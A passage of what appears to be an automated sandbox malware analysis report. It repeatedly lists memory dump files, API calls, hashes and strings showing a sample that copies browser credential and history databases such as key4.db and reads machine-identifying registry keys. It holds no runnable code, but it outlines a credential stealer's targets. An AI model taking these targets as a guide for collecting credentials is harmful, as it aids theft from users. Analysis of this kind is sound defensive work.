                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID: 0$_history.db
                                                                                                                                                                        • API String ID: 4033686569-775750150
                                                                                                                                                                        • Opcode ID: 73ec97c875d54d4ab726ee2811877113cbc281900bea8060ec6c21565228fb68
                                                                                                                                                                        • Instruction ID: 7f6a3eb74ef0e85285c585ebe4a74125a2cb41346c5f1d32340652e493030991
                                                                                                                                                                        • Opcode Fuzzy Hash: 73ec97c875d54d4ab726ee2811877113cbc281900bea8060ec6c21565228fb68
                                                                                                                                                                        • Instruction Fuzzy Hash: 20417179A002459FCB14DFACDC90ADEB7F1EF88704F088569D815E3320E7B4AA45CB55
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0041ECE7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID: 0$ 0
                                                                                                                                                                        • API String ID: 2029273394-2612948726
                                                                                                                                                                        • Opcode ID: 37d5e0687c4c3d398fe0e4ef717b31ebaace2e697620a23a58b9c93b786e8f60
                                                                                                                                                                        • Instruction ID: 44e757e38072f880453abe0a9bf369b55d82b43aeed52d3e213be36514070a5b
                                                                                                                                                                        • Opcode Fuzzy Hash: 37d5e0687c4c3d398fe0e4ef717b31ebaace2e697620a23a58b9c93b786e8f60
                                                                                                                                                                        • Instruction Fuzzy Hash: 1031B436A003459FCB14CF68DD90EE9B3B5FF84200F088A19D80AD7225EBB07B84CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 004324EB
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119), ref: 00432530
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Openmemset
                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                        • API String ID: 180050240-1514646153
                                                                                                                                                                        • Opcode ID: ec86c305ba665aa518877b6104a1604d39340550e6b40df1a610af325c9eb92f
                                                                                                                                                                        • Instruction ID: 7922134af65898dac46d2a273f06d13f3b16e23444d7b6b6c769e211bd11e50b
                                                                                                                                                                        • Opcode Fuzzy Hash: ec86c305ba665aa518877b6104a1604d39340550e6b40df1a610af325c9eb92f
                                                                                                                                                                        • Instruction Fuzzy Hash: 9DF0CDB5601210ABD2149F29EC46D3BBBADDF86B58F05813DFC0887342E7B4DC14C6A6
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00431F79
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID: %s\%s$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                        • API String ID: 71445658-1969869098
                                                                                                                                                                        • Opcode ID: 45a70d14ac73dddba9e890848b8345ee7b3b4bd1af95c889ac66c5af6e304045
                                                                                                                                                                        • Instruction ID: c4fe7f0e1728a372b3c6b641be3a3ba73099cea71fee2bf9f583bb3fda3dae83
                                                                                                                                                                        • Opcode Fuzzy Hash: 45a70d14ac73dddba9e890848b8345ee7b3b4bd1af95c889ac66c5af6e304045
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D015E75709200AFD710CF28CC94E2ABBE8EB89704F45456CF948D7320E7B0A944CF5A
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0043D5C8
                                                                                                                                                                        • InternetOpenA.WININET ref: 0043D66B
                                                                                                                                                                        • InternetOpenA.WININET ref: 0043D698
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InternetOpen$CreateDirectory
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1348255353-0
                                                                                                                                                                        • Opcode ID: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                        • Instruction ID: 6651fc40df9015f60e6afa682878b20fc325aeecd42d68c33a1dafcfb698edc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 47b612a1a10fd9f4aba7bf2a16fbe2945ecdc5d64efd2cd809614f0ad62f8ec8
                                                                                                                                                                        • Instruction Fuzzy Hash: C8711272B002148FCB51DF6CDC91BA9B3F5BF88604F04467DE819D3351EB70AA998B5A
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 004396D5
                                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004396FD
                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043972A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CopyDeleteUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3134562156-0
                                                                                                                                                                        • Opcode ID: b3d90610b9195dac72c709298b4d1c9adf65b200eefc6054539c43cd9a4c3987
                                                                                                                                                                        • Instruction ID: 588a6b5fa3018ceda42b82e9f50853577ca3412cc21646889486619c5310e784
                                                                                                                                                                        • Opcode Fuzzy Hash: b3d90610b9195dac72c709298b4d1c9adf65b200eefc6054539c43cd9a4c3987
                                                                                                                                                                        • Instruction Fuzzy Hash: A8510A767005148FCB68CF9CDCC1D9973F6BF98204B190658E806D73A2EAF0AD45CB66
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0042068C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: \key4.db
                                                                                                                                                                        • API String ID: 1304948518-2908133219
                                                                                                                                                                        • Opcode ID: e0433a541a2c475e30d8dcb9ab7be8879f98edb69430bb3f411822e8431edecb
                                                                                                                                                                        • Instruction ID: f8ad27eb764bb7d653a7dedd4b6e847b451d7ab0834d48651a41f815581897d5
                                                                                                                                                                        • Opcode Fuzzy Hash: e0433a541a2c475e30d8dcb9ab7be8879f98edb69430bb3f411822e8431edecb
                                                                                                                                                                        • Instruction Fuzzy Hash: 60713DB6712A009FD704CFACED94D9DBBF5FF982007084128E845D7321EAB9AE15CB49
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F3DB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID: 0
                                                                                                                                                                        • API String ID: 1304948518-4000257214
                                                                                                                                                                        • Opcode ID: e17b1741426e9313217d84596e32e9c1bbcd7d25749ea705ad0b83eb9b6e5613
                                                                                                                                                                        • Instruction ID: 2ed104a452e55bb280be84cde6660138d5eb36ab6efed2b3cd32ffde3ac5a87e
                                                                                                                                                                        • Opcode Fuzzy Hash: e17b1741426e9313217d84596e32e9c1bbcd7d25749ea705ad0b83eb9b6e5613
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F415076B001109FCB45DF9CDCA1AED73F1BF89704B084579E519E3361EBB0AA158B4A
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041F6B5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
